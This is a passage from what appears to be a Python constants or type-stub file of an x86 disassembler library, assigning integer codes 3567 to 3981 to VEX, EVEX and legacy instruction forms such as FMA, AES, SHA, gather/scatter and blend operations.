EVEX_VFNMADD231PS_YMM_K1Z_YMM_YMMM256B32: int = 3567
EVEX_VFNMADD231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3568
EVEX_VFNMADD231PD_XMM_K1Z_XMM_XMMM128B64: int = 3569
EVEX_VFNMADD231PD_YMM_K1Z_YMM_YMMM256B64: int = 3570
EVEX_VFNMADD231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3571
VEX_VFNMADD231SS_XMM_XMM_XMMM32: int = 3572
VEX_VFNMADD231SD_XMM_XMM_XMMM64: int = 3573
EVEX_VFNMADD231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3574
EVEX_VFNMADD231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3575
VEX_VFNMSUB231PS_XMM_XMM_XMMM128: int = 3576
VEX_VFNMSUB231PS_YMM_YMM_YMMM256: int = 3577
VEX_VFNMSUB231PD_XMM_XMM_XMMM128: int = 3578
VEX_VFNMSUB231PD_YMM_YMM_YMMM256: int = 3579
EVEX_VFNMSUB231PS_XMM_K1Z_XMM_XMMM128B32: int = 3580
EVEX_VFNMSUB231PS_YMM_K1Z_YMM_YMMM256B32: int = 3581
EVEX_VFNMSUB231PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3582
EVEX_VFNMSUB231PD_XMM_K1Z_XMM_XMMM128B64: int = 3583
EVEX_VFNMSUB231PD_YMM_K1Z_YMM_YMMM256B64: int = 3584
EVEX_VFNMSUB231PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3585
VEX_VFNMSUB231SS_XMM_XMM_XMMM32: int = 3586
VEX_VFNMSUB231SD_XMM_XMM_XMMM64: int = 3587
EVEX_VFNMSUB231SS_XMM_K1Z_XMM_XMMM32_ER: int = 3588
EVEX_VFNMSUB231SD_XMM_K1Z_XMM_XMMM64_ER: int = 3589
EVEX_VPCONFLICTD_XMM_K1Z_XMMM128B32: int = 3590
EVEX_VPCONFLICTD_YMM_K1Z_YMMM256B32: int = 3591
EVEX_VPCONFLICTD_ZMM_K1Z_ZMMM512B32: int = 3592
EVEX_VPCONFLICTQ_XMM_K1Z_XMMM128B64: int = 3593
EVEX_VPCONFLICTQ_YMM_K1Z_YMMM256B64: int = 3594
EVEX_VPCONFLICTQ_ZMM_K1Z_ZMMM512B64: int = 3595
EVEX_VGATHERPF0DPS_VM32Z_K1: int = 3596
EVEX_VGATHERPF0DPD_VM32Y_K1: int = 3597
EVEX_VGATHERPF1DPS_VM32Z_K1: int = 3598
EVEX_VGATHERPF1DPD_VM32Y_K1: int = 3599
EVEX_VSCATTERPF0DPS_VM32Z_K1: int = 3600
EVEX_VSCATTERPF0DPD_VM32Y_K1: int = 3601
EVEX_VSCATTERPF1DPS_VM32Z_K1: int = 3602
EVEX_VSCATTERPF1DPD_VM32Y_K1: int = 3603
EVEX_VGATHERPF0QPS_VM64Z_K1: int = 3604
EVEX_VGATHERPF0QPD_VM64Z_K1: int = 3605
EVEX_VGATHERPF1QPS_VM64Z_K1: int = 3606
EVEX_VGATHERPF1QPD_VM64Z_K1: int = 3607
EVEX_VSCATTERPF0QPS_VM64Z_K1: int = 3608
EVEX_VSCATTERPF0QPD_VM64Z_K1: int = 3609
EVEX_VSCATTERPF1QPS_VM64Z_K1: int = 3610
EVEX_VSCATTERPF1QPD_VM64Z_K1: int = 3611
SHA1NEXTE_XMM_XMMM128: int = 3612
EVEX_VEXP2PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3613
EVEX_VEXP2PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3614
SHA1MSG1_XMM_XMMM128: int = 3615
SHA1MSG2_XMM_XMMM128: int = 3616
EVEX_VRCP28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3617
EVEX_VRCP28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3618
SHA256RNDS2_XMM_XMMM128: int = 3619
EVEX_VRCP28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3620
EVEX_VRCP28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3621
SHA256MSG1_XMM_XMMM128: int = 3622
EVEX_VRSQRT28PS_ZMM_K1Z_ZMMM512B32_SAE: int = 3623
EVEX_VRSQRT28PD_ZMM_K1Z_ZMMM512B64_SAE: int = 3624
SHA256MSG2_XMM_XMMM128: int = 3625
EVEX_VRSQRT28SS_XMM_K1Z_XMM_XMMM32_SAE: int = 3626
EVEX_VRSQRT28SD_XMM_K1Z_XMM_XMMM64_SAE: int = 3627
GF2P8MULB_XMM_XMMM128: int = 3628
VEX_VGF2P8MULB_XMM_XMM_XMMM128: int = 3629
VEX_VGF2P8MULB_YMM_YMM_YMMM256: int = 3630
EVEX_VGF2P8MULB_XMM_K1Z_XMM_XMMM128: int = 3631
EVEX_VGF2P8MULB_YMM_K1Z_YMM_YMMM256: int = 3632
EVEX_VGF2P8MULB_ZMM_K1Z_ZMM_ZMMM512: int = 3633
AESIMC_XMM_XMMM128: int = 3634
VEX_VAESIMC_XMM_XMMM128: int = 3635
AESENC_XMM_XMMM128: int = 3636
VEX_VAESENC_XMM_XMM_XMMM128: int = 3637
VEX_VAESENC_YMM_YMM_YMMM256: int = 3638
EVEX_VAESENC_XMM_XMM_XMMM128: int = 3639
EVEX_VAESENC_YMM_YMM_YMMM256: int = 3640
EVEX_VAESENC_ZMM_ZMM_ZMMM512: int = 3641
AESENCLAST_XMM_XMMM128: int = 3642
VEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3643
VEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3644
EVEX_VAESENCLAST_XMM_XMM_XMMM128: int = 3645
EVEX_VAESENCLAST_YMM_YMM_YMMM256: int = 3646
EVEX_VAESENCLAST_ZMM_ZMM_ZMMM512: int = 3647
AESDEC_XMM_XMMM128: int = 3648
VEX_VAESDEC_XMM_XMM_XMMM128: int = 3649
VEX_VAESDEC_YMM_YMM_YMMM256: int = 3650
EVEX_VAESDEC_XMM_XMM_XMMM128: int = 3651
EVEX_VAESDEC_YMM_YMM_YMMM256: int = 3652
EVEX_VAESDEC_ZMM_ZMM_ZMMM512: int = 3653
AESDECLAST_XMM_XMMM128: int = 3654
VEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3655
VEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3656
EVEX_VAESDECLAST_XMM_XMM_XMMM128: int = 3657
EVEX_VAESDECLAST_YMM_YMM_YMMM256: int = 3658
EVEX_VAESDECLAST_ZMM_ZMM_ZMMM512: int = 3659
MOVBE_R16_M16: int = 3660
MOVBE_R32_M32: int = 3661
MOVBE_R64_M64: int = 3662
CRC32_R32_RM8: int = 3663
CRC32_R64_RM8: int = 3664
MOVBE_M16_R16: int = 3665
MOVBE_M32_R32: int = 3666
MOVBE_M64_R64: int = 3667
CRC32_R32_RM16: int = 3668
CRC32_R32_RM32: int = 3669
CRC32_R64_RM64: int = 3670
VEX_ANDN_R32_R32_RM32: int = 3671
VEX_ANDN_R64_R64_RM64: int = 3672
VEX_BLSR_R32_RM32: int = 3673
VEX_BLSR_R64_RM64: int = 3674
VEX_BLSMSK_R32_RM32: int = 3675
VEX_BLSMSK_R64_RM64: int = 3676
VEX_BLSI_R32_RM32: int = 3677
VEX_BLSI_R64_RM64: int = 3678
VEX_BZHI_R32_RM32_R32: int = 3679
VEX_BZHI_R64_RM64_R64: int = 3680
WRUSSD_M32_R32: int = 3681
WRUSSQ_M64_R64: int = 3682
VEX_PEXT_R32_R32_RM32: int = 3683
VEX_PEXT_R64_R64_RM64: int = 3684
VEX_PDEP_R32_R32_RM32: int = 3685
VEX_PDEP_R64_R64_RM64: int = 3686
WRSSD_M32_R32: int = 3687
WRSSQ_M64_R64: int = 3688
ADCX_R32_RM32: int = 3689
ADCX_R64_RM64: int = 3690
ADOX_R32_RM32: int = 3691
ADOX_R64_RM64: int = 3692
VEX_MULX_R32_R32_RM32: int = 3693
VEX_MULX_R64_R64_RM64: int = 3694
VEX_BEXTR_R32_RM32_R32: int = 3695
VEX_BEXTR_R64_RM64_R64: int = 3696
VEX_SHLX_R32_RM32_R32: int = 3697
VEX_SHLX_R64_RM64_R64: int = 3698
VEX_SARX_R32_RM32_R32: int = 3699
VEX_SARX_R64_RM64_R64: int = 3700
VEX_SHRX_R32_RM32_R32: int = 3701
VEX_SHRX_R64_RM64_R64: int = 3702
MOVDIR64B_R16_M512: int = 3703
MOVDIR64B_R32_M512: int = 3704
MOVDIR64B_R64_M512: int = 3705
ENQCMDS_R16_M512: int = 3706
ENQCMDS_R32_M512: int = 3707
ENQCMDS_R64_M512: int = 3708
ENQCMD_R16_M512: int = 3709
ENQCMD_R32_M512: int = 3710
ENQCMD_R64_M512: int = 3711
MOVDIRI_M32_R32: int = 3712
MOVDIRI_M64_R64: int = 3713
VEX_VPERMQ_YMM_YMMM256_IMM8: int = 3714
EVEX_VPERMQ_YMM_K1Z_YMMM256B64_IMM8: int = 3715
EVEX_VPERMQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 3716
VEX_VPERMPD_YMM_YMMM256_IMM8: int = 3717
EVEX_VPERMPD_YMM_K1Z_YMMM256B64_IMM8: int = 3718
EVEX_VPERMPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3719
VEX_VPBLENDD_XMM_XMM_XMMM128_IMM8: int = 3720
VEX_VPBLENDD_YMM_YMM_YMMM256_IMM8: int = 3721
EVEX_VALIGND_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3722
EVEX_VALIGND_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3723
EVEX_VALIGND_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3724
EVEX_VALIGNQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3725
EVEX_VALIGNQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3726
EVEX_VALIGNQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3727
VEX_VPERMILPS_XMM_XMMM128_IMM8: int = 3728
VEX_VPERMILPS_YMM_YMMM256_IMM8: int = 3729
EVEX_VPERMILPS_XMM_K1Z_XMMM128B32_IMM8: int = 3730
EVEX_VPERMILPS_YMM_K1Z_YMMM256B32_IMM8: int = 3731
EVEX_VPERMILPS_ZMM_K1Z_ZMMM512B32_IMM8: int = 3732
VEX_VPERMILPD_XMM_XMMM128_IMM8: int = 3733
VEX_VPERMILPD_YMM_YMMM256_IMM8: int = 3734
EVEX_VPERMILPD_XMM_K1Z_XMMM128B64_IMM8: int = 3735
EVEX_VPERMILPD_YMM_K1Z_YMMM256B64_IMM8: int = 3736
EVEX_VPERMILPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3737
VEX_VPERM2F128_YMM_YMM_YMMM256_IMM8: int = 3738
ROUNDPS_XMM_XMMM128_IMM8: int = 3739
VEX_VROUNDPS_XMM_XMMM128_IMM8: int = 3740
VEX_VROUNDPS_YMM_YMMM256_IMM8: int = 3741
EVEX_VRNDSCALEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3742
EVEX_VRNDSCALEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3743
EVEX_VRNDSCALEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3744
ROUNDPD_XMM_XMMM128_IMM8: int = 3745
VEX_VROUNDPD_XMM_XMMM128_IMM8: int = 3746
VEX_VROUNDPD_YMM_YMMM256_IMM8: int = 3747
EVEX_VRNDSCALEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3748
EVEX_VRNDSCALEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3749
EVEX_VRNDSCALEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3750
ROUNDSS_XMM_XMMM32_IMM8: int = 3751
VEX_VROUNDSS_XMM_XMM_XMMM32_IMM8: int = 3752
EVEX_VRNDSCALESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3753
ROUNDSD_XMM_XMMM64_IMM8: int = 3754
VEX_VROUNDSD_XMM_XMM_XMMM64_IMM8: int = 3755
EVEX_VRNDSCALESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3756
BLENDPS_XMM_XMMM128_IMM8: int = 3757
VEX_VBLENDPS_XMM_XMM_XMMM128_IMM8: int = 3758
VEX_VBLENDPS_YMM_YMM_YMMM256_IMM8: int = 3759
BLENDPD_XMM_XMMM128_IMM8: int = 3760
VEX_VBLENDPD_XMM_XMM_XMMM128_IMM8: int = 3761
VEX_VBLENDPD_YMM_YMM_YMMM256_IMM8: int = 3762
PBLENDW_XMM_XMMM128_IMM8: int = 3763
VEX_VPBLENDW_XMM_XMM_XMMM128_IMM8: int = 3764
VEX_VPBLENDW_YMM_YMM_YMMM256_IMM8: int = 3765
PALIGNR_MM_MMM64_IMM8: int = 3766
PALIGNR_XMM_XMMM128_IMM8: int = 3767
VEX_VPALIGNR_XMM_XMM_XMMM128_IMM8: int = 3768
VEX_VPALIGNR_YMM_YMM_YMMM256_IMM8: int = 3769
EVEX_VPALIGNR_XMM_K1Z_XMM_XMMM128_IMM8: int = 3770
EVEX_VPALIGNR_YMM_K1Z_YMM_YMMM256_IMM8: int = 3771
EVEX_VPALIGNR_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3772
PEXTRB_R32M8_XMM_IMM8: int = 3773
PEXTRB_R64M8_XMM_IMM8: int = 3774
VEX_VPEXTRB_R32M8_XMM_IMM8: int = 3775
VEX_VPEXTRB_R64M8_XMM_IMM8: int = 3776
EVEX_VPEXTRB_R32M8_XMM_IMM8: int = 3777
EVEX_VPEXTRB_R64M8_XMM_IMM8: int = 3778
PEXTRW_R32M16_XMM_IMM8: int = 3779
PEXTRW_R64M16_XMM_IMM8: int = 3780
VEX_VPEXTRW_R32M16_XMM_IMM8: int = 3781
VEX_VPEXTRW_R64M16_XMM_IMM8: int = 3782
EVEX_VPEXTRW_R32M16_XMM_IMM8: int = 3783
EVEX_VPEXTRW_R64M16_XMM_IMM8: int = 3784
PEXTRD_RM32_XMM_IMM8: int = 3785
PEXTRQ_RM64_XMM_IMM8: int = 3786
VEX_VPEXTRD_RM32_XMM_IMM8: int = 3787
VEX_VPEXTRQ_RM64_XMM_IMM8: int = 3788
EVEX_VPEXTRD_RM32_XMM_IMM8: int = 3789
EVEX_VPEXTRQ_RM64_XMM_IMM8: int = 3790
EXTRACTPS_RM32_XMM_IMM8: int = 3791
EXTRACTPS_R64M32_XMM_IMM8: int = 3792
VEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3793
VEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3794
EVEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3795
EVEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3796
VEX_VINSERTF128_YMM_YMM_XMMM128_IMM8: int = 3797
EVEX_VINSERTF32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3798
EVEX_VINSERTF32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3799
EVEX_VINSERTF64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3800
EVEX_VINSERTF64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3801
VEX_VEXTRACTF128_XMMM128_YMM_IMM8: int = 3802
EVEX_VEXTRACTF32X4_XMMM128_K1Z_YMM_IMM8: int = 3803
EVEX_VEXTRACTF32X4_XMMM128_K1Z_ZMM_IMM8: int = 3804
EVEX_VEXTRACTF64X2_XMMM128_K1Z_YMM_IMM8: int = 3805
EVEX_VEXTRACTF64X2_XMMM128_K1Z_ZMM_IMM8: int = 3806
EVEX_VINSERTF32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3807
EVEX_VINSERTF64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3808
EVEX_VEXTRACTF32X8_YMMM256_K1Z_ZMM_IMM8: int = 3809
EVEX_VEXTRACTF64X4_YMMM256_K1Z_ZMM_IMM8: int = 3810
VEX_VCVTPS2PH_XMMM64_XMM_IMM8: int = 3811
VEX_VCVTPS2PH_XMMM128_YMM_IMM8: int = 3812
EVEX_VCVTPS2PH_XMMM64_K1Z_XMM_IMM8: int = 3813
EVEX_VCVTPS2PH_XMMM128_K1Z_YMM_IMM8: int = 3814
EVEX_VCVTPS2PH_YMMM256_K1Z_ZMM_IMM8_SAE: int = 3815
EVEX_VPCMPUD_KR_K1_XMM_XMMM128B32_IMM8: int = 3816
EVEX_VPCMPUD_KR_K1_YMM_YMMM256B32_IMM8: int = 3817
EVEX_VPCMPUD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3818
EVEX_VPCMPUQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3819
EVEX_VPCMPUQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3820
EVEX_VPCMPUQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3821
EVEX_VPCMPD_KR_K1_XMM_XMMM128B32_IMM8: int = 3822
EVEX_VPCMPD_KR_K1_YMM_YMMM256B32_IMM8: int = 3823
EVEX_VPCMPD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3824
EVEX_VPCMPQ_KR_K1_XMM_XMMM128B64_IMM8: int = 3825
EVEX_VPCMPQ_KR_K1_YMM_YMMM256B64_IMM8: int = 3826
EVEX_VPCMPQ_KR_K1_ZMM_ZMMM512B64_IMM8: int = 3827
PINSRB_XMM_R32M8_IMM8: int = 3828
PINSRB_XMM_R64M8_IMM8: int = 3829
VEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3830
VEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3831
EVEX_VPINSRB_XMM_XMM_R32M8_IMM8: int = 3832
EVEX_VPINSRB_XMM_XMM_R64M8_IMM8: int = 3833
INSERTPS_XMM_XMMM32_IMM8: int = 3834
VEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3835
EVEX_VINSERTPS_XMM_XMM_XMMM32_IMM8: int = 3836
PINSRD_XMM_RM32_IMM8: int = 3837
PINSRQ_XMM_RM64_IMM8: int = 3838
VEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3839
VEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3840
EVEX_VPINSRD_XMM_XMM_RM32_IMM8: int = 3841
EVEX_VPINSRQ_XMM_XMM_RM64_IMM8: int = 3842
EVEX_VSHUFF32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3843
EVEX_VSHUFF32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3844
EVEX_VSHUFF64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3845
EVEX_VSHUFF64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3846
EVEX_VPTERNLOGD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3847
EVEX_VPTERNLOGD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3848
EVEX_VPTERNLOGD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3849
EVEX_VPTERNLOGQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3850
EVEX_VPTERNLOGQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3851
EVEX_VPTERNLOGQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3852
EVEX_VGETMANTPS_XMM_K1Z_XMMM128B32_IMM8: int = 3853
EVEX_VGETMANTPS_YMM_K1Z_YMMM256B32_IMM8: int = 3854
EVEX_VGETMANTPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3855
EVEX_VGETMANTPD_XMM_K1Z_XMMM128B64_IMM8: int = 3856
EVEX_VGETMANTPD_YMM_K1Z_YMMM256B64_IMM8: int = 3857
EVEX_VGETMANTPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3858
EVEX_VGETMANTSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3859
EVEX_VGETMANTSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3860
VEX_KSHIFTRB_KR_KR_IMM8: int = 3861
VEX_KSHIFTRW_KR_KR_IMM8: int = 3862
VEX_KSHIFTRD_KR_KR_IMM8: int = 3863
VEX_KSHIFTRQ_KR_KR_IMM8: int = 3864
VEX_KSHIFTLB_KR_KR_IMM8: int = 3865
VEX_KSHIFTLW_KR_KR_IMM8: int = 3866
VEX_KSHIFTLD_KR_KR_IMM8: int = 3867
VEX_KSHIFTLQ_KR_KR_IMM8: int = 3868
VEX_VINSERTI128_YMM_YMM_XMMM128_IMM8: int = 3869
EVEX_VINSERTI32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3870
EVEX_VINSERTI32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3871
EVEX_VINSERTI64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3872
EVEX_VINSERTI64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3873
VEX_VEXTRACTI128_XMMM128_YMM_IMM8: int = 3874
EVEX_VEXTRACTI32X4_XMMM128_K1Z_YMM_IMM8: int = 3875
EVEX_VEXTRACTI32X4_XMMM128_K1Z_ZMM_IMM8: int = 3876
EVEX_VEXTRACTI64X2_XMMM128_K1Z_YMM_IMM8: int = 3877
EVEX_VEXTRACTI64X2_XMMM128_K1Z_ZMM_IMM8: int = 3878
EVEX_VINSERTI32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3879
EVEX_VINSERTI64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3880
EVEX_VEXTRACTI32X8_YMMM256_K1Z_ZMM_IMM8: int = 3881
EVEX_VEXTRACTI64X4_YMMM256_K1Z_ZMM_IMM8: int = 3882
EVEX_VPCMPUB_KR_K1_XMM_XMMM128_IMM8: int = 3883
EVEX_VPCMPUB_KR_K1_YMM_YMMM256_IMM8: int = 3884
EVEX_VPCMPUB_KR_K1_ZMM_ZMMM512_IMM8: int = 3885
EVEX_VPCMPUW_KR_K1_XMM_XMMM128_IMM8: int = 3886
EVEX_VPCMPUW_KR_K1_YMM_YMMM256_IMM8: int = 3887
EVEX_VPCMPUW_KR_K1_ZMM_ZMMM512_IMM8: int = 3888
EVEX_VPCMPB_KR_K1_XMM_XMMM128_IMM8: int = 3889
EVEX_VPCMPB_KR_K1_YMM_YMMM256_IMM8: int = 3890
EVEX_VPCMPB_KR_K1_ZMM_ZMMM512_IMM8: int = 3891
EVEX_VPCMPW_KR_K1_XMM_XMMM128_IMM8: int = 3892
EVEX_VPCMPW_KR_K1_YMM_YMMM256_IMM8: int = 3893
EVEX_VPCMPW_KR_K1_ZMM_ZMMM512_IMM8: int = 3894
DPPS_XMM_XMMM128_IMM8: int = 3895
VEX_VDPPS_XMM_XMM_XMMM128_IMM8: int = 3896
VEX_VDPPS_YMM_YMM_YMMM256_IMM8: int = 3897
DPPD_XMM_XMMM128_IMM8: int = 3898
VEX_VDPPD_XMM_XMM_XMMM128_IMM8: int = 3899
MPSADBW_XMM_XMMM128_IMM8: int = 3900
VEX_VMPSADBW_XMM_XMM_XMMM128_IMM8: int = 3901
VEX_VMPSADBW_YMM_YMM_YMMM256_IMM8: int = 3902
EVEX_VDBPSADBW_XMM_K1Z_XMM_XMMM128_IMM8: int = 3903
EVEX_VDBPSADBW_YMM_K1Z_YMM_YMMM256_IMM8: int = 3904
EVEX_VDBPSADBW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3905
EVEX_VSHUFI32X4_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3906
EVEX_VSHUFI32X4_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3907
EVEX_VSHUFI64X2_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3908
EVEX_VSHUFI64X2_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3909
PCLMULQDQ_XMM_XMMM128_IMM8: int = 3910
VEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3911
VEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3912
EVEX_VPCLMULQDQ_XMM_XMM_XMMM128_IMM8: int = 3913
EVEX_VPCLMULQDQ_YMM_YMM_YMMM256_IMM8: int = 3914
EVEX_VPCLMULQDQ_ZMM_ZMM_ZMMM512_IMM8: int = 3915
VEX_VPERM2I128_YMM_YMM_YMMM256_IMM8: int = 3916
VEX_VPERMIL2PS_XMM_XMM_XMMM128_XMM_IMM4: int = 3917
VEX_VPERMIL2PS_YMM_YMM_YMMM256_YMM_IMM4: int = 3918
VEX_VPERMIL2PS_XMM_XMM_XMM_XMMM128_IMM4: int = 3919
VEX_VPERMIL2PS_YMM_YMM_YMM_YMMM256_IMM4: int = 3920
VEX_VPERMIL2PD_XMM_XMM_XMMM128_XMM_IMM4: int = 3921
VEX_VPERMIL2PD_YMM_YMM_YMMM256_YMM_IMM4: int = 3922
VEX_VPERMIL2PD_XMM_XMM_XMM_XMMM128_IMM4: int = 3923
VEX_VPERMIL2PD_YMM_YMM_YMM_YMMM256_IMM4: int = 3924
VEX_VBLENDVPS_XMM_XMM_XMMM128_XMM: int = 3925
VEX_VBLENDVPS_YMM_YMM_YMMM256_YMM: int = 3926
VEX_VBLENDVPD_XMM_XMM_XMMM128_XMM: int = 3927
VEX_VBLENDVPD_YMM_YMM_YMMM256_YMM: int = 3928
VEX_VPBLENDVB_XMM_XMM_XMMM128_XMM: int = 3929
VEX_VPBLENDVB_YMM_YMM_YMMM256_YMM: int = 3930
EVEX_VRANGEPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3931
EVEX_VRANGEPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3932
EVEX_VRANGEPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3933
EVEX_VRANGEPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3934
EVEX_VRANGEPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3935
EVEX_VRANGEPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3936
EVEX_VRANGESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3937
EVEX_VRANGESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3938
EVEX_VFIXUPIMMPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3939
EVEX_VFIXUPIMMPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3940
EVEX_VFIXUPIMMPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3941
EVEX_VFIXUPIMMPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3942
EVEX_VFIXUPIMMPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3943
EVEX_VFIXUPIMMPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3944
EVEX_VFIXUPIMMSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3945
EVEX_VFIXUPIMMSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3946
EVEX_VREDUCEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3947
EVEX_VREDUCEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3948
EVEX_VREDUCEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3949
EVEX_VREDUCEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3950
EVEX_VREDUCEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3951
EVEX_VREDUCEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3952
EVEX_VREDUCESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3953
EVEX_VREDUCESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3954
VEX_VFMADDSUBPS_XMM_XMM_XMMM128_XMM: int = 3955
VEX_VFMADDSUBPS_YMM_YMM_YMMM256_YMM: int = 3956
VEX_VFMADDSUBPS_XMM_XMM_XMM_XMMM128: int = 3957
VEX_VFMADDSUBPS_YMM_YMM_YMM_YMMM256: int = 3958
VEX_VFMADDSUBPD_XMM_XMM_XMMM128_XMM: int = 3959
VEX_VFMADDSUBPD_YMM_YMM_YMMM256_YMM: int = 3960
VEX_VFMADDSUBPD_XMM_XMM_XMM_XMMM128: int = 3961
VEX_VFMADDSUBPD_YMM_YMM_YMM_YMMM256: int = 3962
VEX_VFMSUBADDPS_XMM_XMM_XMMM128_XMM: int = 3963
VEX_VFMSUBADDPS_YMM_YMM_YMMM256_YMM: int = 3964
VEX_VFMSUBADDPS_XMM_XMM_XMM_XMMM128: int = 3965
VEX_VFMSUBADDPS_YMM_YMM_YMM_YMMM256: int = 3966
VEX_VFMSUBADDPD_XMM_XMM_XMMM128_XMM: int = 3967
VEX_VFMSUBADDPD_YMM_YMM_YMMM256_YMM: int = 3968
VEX_VFMSUBADDPD_XMM_XMM_XMM_XMMM128: int = 3969
VEX_VFMSUBADDPD_YMM_YMM_YMM_YMMM256: int = 3970
PCMPESTRM_XMM_XMMM128_IMM8: int = 3971
PCMPESTRM64_XMM_XMMM128_IMM8: int = 3972
VEX_VPCMPESTRM_XMM_XMMM128_IMM8: int = 3973
VEX_VPCMPESTRM64_XMM_XMMM128_IMM8: int = 3974
PCMPESTRI_XMM_XMMM128_IMM8: int = 3975
PCMPESTRI64_XMM_XMMM128_IMM8: int = 3976
VEX_VPCMPESTRI_XMM_XMMM128_IMM8: int = 3977
VEX_VPCMPESTRI64_XMM_XMMM128_IMM8: int = 3978
PCMPISTRM_XMM_XMMM128_IMM8: int = 3979
VEX_VPCMPISTRM_XMM_XMMM128_IMM8: int = 3980
PCMPISTRI_XMM_XMMM128_IMM8: int = 3981
